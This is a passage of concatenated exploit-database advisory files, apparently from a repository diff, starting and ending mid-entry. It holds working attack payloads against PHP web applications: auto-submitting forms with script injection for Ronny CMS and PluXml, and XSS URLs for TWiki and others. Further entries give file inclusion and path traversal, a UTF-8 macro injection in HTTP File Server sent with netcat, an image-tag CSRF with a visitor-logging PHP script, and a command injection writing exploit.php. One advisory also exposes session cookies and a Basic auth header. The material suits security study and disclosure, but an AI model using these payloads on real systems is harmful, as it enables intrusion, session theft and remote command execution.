Ronny CMS 1.1 r935 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/system/admin.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="bside" value="0" />
<input type="hidden" name="bshow_template" value="standard" />
<input type="hidden" name="bcmodule[]" value="-1" />
<input type="hidden" name="bcmodule[]" value="0" />
<input type="hidden" name="bcmodule[]" value="2" />
<input type="hidden" name="bcmodule[]" value="3" />
<input type="hidden" name="bvisible" value="0" />
<input type="hidden" name="bweight" value="" />
<input type="hidden" name="btitle" value='1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="bcontent" value="" />
<input type="hidden" name="bctype" value="H" />
<input type="hidden" name="fct" value="blocksadmin" />
<input type="hidden" name="op" value="save" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/menu/admin/index.php?op=saveItem" method="post" name="main" >
<input type="hidden" name="menuid" value="1" />
<input type="hidden" name="id" value="2" />
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="name" value='Pages<script>alert(document.cookie)</script>' />
<input type="hidden" name="url" value="/pages/" />
<input type="hidden" name="order" value="20" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/pages/admin/index.php?op=editPage1" method="post" enctype="multipart/form-data" >
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="pname" value="Page name" />
<input type="hidden" name="purl" value="main" />
<input type="hidden" name="ptemplate" value="index" />
<input type="hidden" name="porder" value="0" />
<input type="hidden" name="ptext" value="Ronny CMS page text" />
<input type="hidden" name="pfile"; filename="" />
<input type="hidden" name="pdesc" value='page description"><script>alert(document.cookie)</script>' />
<input type="hidden" name="pkeywords" value="page metas" />
<input type="hidden" name="ptags" value="" />
<input type="hidden" name="update_pid" value="1" />
<input type="submit" id="btn" name="submit" value="SAVE" />
</form>
<script>
document.getElementById('btn').click();
</script>

73
platforms/php/webapps/34841.txt Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/44069/info
PluXml is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
PluXml 5.0.1 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/core/admin/profil.php" method="post" name="main" >
<input type="hidden" name="name" value="Ildar">
<input type="hidden" name="infos" value='<script>alert(document.cookie)</script>'>
<input type="hidden" name="profil" value="Modifier votre profil">
<input type="hidden" name="password1" value="">
<input type="hidden" name="password2" value="">
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/core/admin/statique.php" method="post" name="main" >
<input type="hidden" name="id" value="001">
<input type="hidden" name="content" value="<p><?php echo 'Ma premi&egrave;re page statique !'; ?></p><script>alert(document.cookie)</script>">
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/core/admin/article.php" method="post" name="main" >
<input type="hidden" name="artId" value="0001">
<input type="hidden" name="title" value="article title">
<input type="hidden" name="author" value="001">
<input type="hidden" name="chapo" value="">
<input type="hidden" name="content" value='page html content"><script>alert(document.cookie)</script>'>
<input type="hidden" name="day" value="23">
<input type="hidden" name="month" value="09">
<input type="hidden" name="year" value="2010">
<input type="hidden" name="time" value="15:45">
<input type="hidden" name="catId[]" value="001">
<input type="hidden" name="new_catid" value="002">
<input type="hidden" name="new_catname" value="">
<input type="hidden" name="tags" value="PluXml">
<input type="hidden" name="allow_com" value="1">
<input type="hidden" name="url" value="article-page-url">
<input type="hidden" name="template" value="article.php">
<input type="hidden" name="preview" value="Aper&ccedil;u">
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/core/admin/parametres_base.php" method="post" name="main" >
<input type="hidden" name="title" value='PluXml"><script>alert(document.cookie)</script>'>
<input type="hidden" name="description" value="le blog full XML">
<input type="hidden" name="racine" value="http://www.example.com/">
<input type="hidden" name="delta" value="+00:00">
<input type="hidden" name="allow_com" value="1">
<input type="hidden" name="mod_com" value="0">
<input type="hidden" name="editor" value="plxtoolbar">
</form>
<script>
document.main.submit();
</script>

9
platforms/php/webapps/34842.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44103/info
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.0.1 are vulnerable.
GET /twiki/bin/view?rev=%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E

9
platforms/php/webapps/34843.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44103/info
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.0.1 are vulnerable.
GET /twiki/bin/login?origurl=&ANYTHING%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E

9
platforms/php/webapps/34845.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44136/info
PHP Photo Vote is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Photo Vote 1.3F is vulnerable; other versions may also be affected.
http://www.example.com/demo/photovote/login.php?page="><script>alert(document.cookie);</script>

11
platforms/php/webapps/34847.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/44142/info
PHP Easy Shopping Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Easy Shopping Cart 3.1R is vulnerable; others versions may also be affected.
http://example.com/subitems.php?id=[NB]&name=[XSS]
http://example.com/demo/plant/subitems.php?id=16&name="><script>alert(document.cookie);</script>

11
platforms/php/webapps/34849.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/44165/info
AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.
AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00
http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?

12
platforms/php/webapps/34850.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/44169/info
eXV2 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
eXV2 CMS 2.10 is vulnerable; other versions may also be affected.
http://www.example.com/manual/caferss/example.php?rssfeedURL="%20onmouseover=prompt(1)%20xss="&submit=OK
http://www.example.com/modules/news/archive.php?subm="><script>alert(1)</script>
http://www.example.com/modules/news/topics.php?subm="><script>alert(1)</script>
http://www.example.com/modules/contact/index.php?op=contact&subm="><script>alert(1)</script>

44
platforms/php/webapps/34852.txt Executable file
View file

@ -0,0 +1,44 @@
==========================================================
HTTP File Server 2.3a - 2.3b - 2.3c Remote Command Execution
# Author : Daniele Linguaglossa
# Date: 30/09/2014
# Remote: Yes
# Vendor Homepage: http://rejetto.com/
# Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip
# CVE: CVE-2014-7226
# Vendor Hompage: http://www.rejetto.com
# Tested on: Windows 8
# Version: 2.3a - 2.3b - 2.3c
The latest HTTP File Server (2.3c and maybe prior too) was found to be
vulnerable to a remote command execution in the file comment features ,
because the application did not properly validate uft-8 broken byte
representation, in fact during parsing program won't notice that there are
multiple invalid representation and when they are printed into the page
will get replaced with one of these characters " { . | } " causing a macro
to be executed.
==========================================================
PoC
==========================================================
bug-utf8.txt
==========================================================
POST /upload/?mode=section&id=ajax.comment HTTP/1.1
Connection: Close
Content-Type:application/x-www-form-urlencoded
text=%c1%bb%c0%aeexec%c1%bccmd%c0%ae%c1%bd&files=x
==========================================================
Copy the following on a file called bug-utf8.txt , then open hfs and add a
folder called upload,
it will ask if anyone should have upload permission click yes then with
netcat do the following:
nc localhost 8080 < bug-utf8.txt
if everything was fine you should see a new command prompt being executed
from hfs.
==========================================================
EOF

368
platforms/php/webapps/34854.txt Executable file
View file

@ -0,0 +1,368 @@
Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
Release Date:
=============
2014-09-29
Vulnerability Laboratory ID (VL-ID):
====================================
1327
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security
practices and techniques.
(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.
The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section
next to the input field context that gets displayed again.
The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section
next to the input field context that gets displayed again.
The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Vulnerable Parameter(s):
[+] 404 detection redirect url
[+] file name error logs url
Affected Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or
medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and
steps below to continue.
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
<tr valign="top">
<th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\"
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
<span class="description">A blocked visitor will be automatically redirected to this URL.</span>
</td>
</tr>
</table>
<input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />
</form>
</div></div>
<div class="postbox">
<h3><label for="title">404 Event Logs</label></h3>
<div class="inside">
<form id="tables-filter" method="post">
<!-- For plugins, we also need to ensure that the form posts back to our current page -->
<input type="hidden" name="page" value="aiowpsec_firewall" />
<input type="hidden" name="tab" value="tab6" /> <!-- Now we can render the completed list table -->
<input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer"
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top">
<div class="alignleft actions">
<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")" />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'></a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'></a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:21 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[8095]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:22 GMT]
Content-Type[text/html]
Content-Length[557]
Connection[keep-alive]
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
Etag["4ea065b-3c6-4dcad48e5901e"]
Accept-Ranges[bytes]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Powered-By[PleskLin]
Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
1.2
The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium
user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: FileSystem Components > Host System Logs
<div class="inside">
<p>Please click the button below to view the latest system logs:</p>
<form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
<input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
<span class="description">Enter your system log file name. (Defaults to error_log)</span>
</div>
<div class="aio_spacer_15"></div>
<input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
<span style="display: none;" class="aiowps_loading_1">
<img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
</span>
</form>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Content-Length[109]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
interval[60]
_nonce[176fea481c]
action[heartbeat]
screen_id[wp-security_page_aiowpsec_filesystem]
has_focus[false]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:44 GMT]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Robots-Tag[noindex]
x-content-type-options[nosniff]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:54 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[6136]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module.
The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module.
Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks.
Security Risk:
==============
The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

43
platforms/php/webapps/34858.txt Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux
HOW TO
======
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
TEST
====
Based on demo.rbschange.fr:
---------------------------
[img="http://server/fr/deconnexion/"][/img]
Will disconnect all users who load the image.
Other example:
--------------
[img="http://www.example.com/log.php"][/img]
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip - $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);
?>
To get users ip, user agent, ...

30
platforms/php/webapps/34861.txt Executable file
View file

@ -0,0 +1,30 @@
Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS
CVE: CVE-2014-6389
Vendor: PHPCompta
Product: PHPCompta/NOALYSS
Affected version: 6.7.1 5638
Fixed version: 6.7.2
Reported by: Jerzy Kramarz
Details:
PhpCompta 6.7.1-2 does not validate the syntax of the commands when processing backup requests from users. It is possible to abuse the 'd' parameter to inject additional parameters that will then be passed via the php passthru() function to create a backup file, which will subsequently be executed. The proof of concept below will create a file 'exploit.php' in the root directory of the application, which will execute phpinfo() function when called.
GET /phpcompta/backup.php?sa=b&t=m&d=123;%20echo%20%22%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%22%20>%20exploit.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3nckv75pburv54tm2iq79dfgl6
Connection: keep-alive
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6389/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

69
platforms/php/webapps/34863.txt Executable file
View file

@ -0,0 +1,69 @@
Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink
CVE: CVE-2014-5308
Vendor: Testlink
Product: TestLink
Affected version: 1.9.11
Fixed version: Fixed in SVN commit number 7a09973
Reported by: Jerzy Kramarz
Details:
Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
Vulnerability 1 (Fixed in commit #7a09973 in official repository)
<pre>
POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
Cookie: [...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
